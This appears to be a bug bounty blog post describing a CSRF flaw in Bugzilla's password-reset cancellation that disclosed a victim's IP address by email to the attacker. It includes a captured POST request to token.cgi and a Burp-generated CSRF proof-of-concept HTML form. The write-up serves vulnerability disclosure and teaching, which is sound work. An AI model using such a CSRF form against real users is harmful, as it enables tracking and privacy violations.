Information Disclosure on Mozilla | Bug Bounty

 

Overview

In this blog, I’ll take you through a fascinating bug bounty report involving information disclosure on the password cancel endpoint of Mozilla’s Bugzilla platform. This case highlights how a seemingly low-severity vulnerability can have significant implications when exploited strategically.

Vulnerability Summary

The reported issue involved an attacker being able to obtain a victim’s IP address through a CSRF (Cross-Site Request Forgery) attack on the password reset cancellation process. When a victim clicked on a malicious link crafted by the attacker, the attacker would receive a notification email containing the victim’s IP address.

While IP addresses are not always considered sensitive information, their disclosure can lead to privacy violations or further exploitation in certain scenarios.

Technical Details

  1. Affected Endpoint:
    The vulnerability was present in the password reset cancellation process at https://bugzilla.mozilla.org.

  2. Exploitation Flow:

    • An attacker creates an account on the platform and observes the password reset workflow.
    • The attacker notices that when a password reset request is canceled, the platform sends an email that includes the requester’s IP address.
    • The attacker crafts a CSRF payload that leverages this functionality.

  3. Proof-of-Concept (PoC):
    Here’s an example of the malicious CSRF payload used:

    REQUEST:

    POST /token.cgi HTTP/2
    Host: bugzilla.mozilla.org
    Cookie: _ga=GA1.2.943165794.1724831061; _ga_PWTK27XVWP=GS1.1.1724884053.2.0.1724884053.0.0.0; _ga_MQ7767QQQW=GS1.1.1726224133.2.0.1726224133.0.0.0; _ga_B9CY1C9VBC=GS1.1.1727174575.2.1.1727174593.0.0.0; _gid=GA1.2.1127107875.1727130511
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 114
    Origin: http://burpsuite
    Referer: http://burpsuite/
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Sec-Fetch-User: ?1
    Priority: u=0, i
    Te: trailers

    cancel_token=1727251240-UxKc4U5ThgrHPhWNJ323-fahjy5Pn05h5ZYb7OqG-SI&t=3XOIDGIRtcwC3icniucOlm&a=cxlpw&cancel=Cancel

     

    Convert to CSRF:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="https://bugzilla.mozilla.org/token.cgi" method="POST">
          <input type="hidden" name="cancel&#95;token" value="1727251240&#45;UxKc4U5ThgrHPhWNJ323&#45;fahjy5Pn05h5ZYb7OqG&#45;SI" />
          <input type="hidden" name="t" value="3XOIDGIRtcwC3icniucOlm" />
          <input type="hidden" name="a" value="cxlpw" />
          <input type="hidden" name="cancel" value="Cancel" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

     

     

    1. Impact:

      • The attacker sends the malicious link to the victim, tricking them into clicking it.
      • When the victim interacts with the link, the cancellation email is triggered and sent to the attacker’s email address.
      • The attacker gains access to the victim’s IP address.

    Severity and Rationale

    Initially, the vulnerability was classified as low severity due to the following:

  4. IP addresses are generally not regarded as highly sensitive.
  5. Most users have dynamic IPs, which change over time.
  6. An IP address alone does not provide significant leverage without additional context or vulnerabilities.

However, the reporter highlighted that similar vulnerabilities were previously accepted by Mozilla, leading to the reopening of the report for further review.

Lessons Learned

  1. Persistence Pays Off:
    The researcher’s persistence in referencing prior reports and explaining the significance of the issue led to the reopening and eventual resolution of the bug.

  2. Low-Hanging Vulnerabilities Can Matter:
    Even low-severity issues, when contextualized properly, can warrant attention. Organizations should carefully assess the implications of such findings.

  3. The Power of CSRF:
    CSRF vulnerabilities, though common, can lead to unexpected consequences, such as sensitive information disclosure, as seen in this case.

     

Comments

Post a Comment

Popular Posts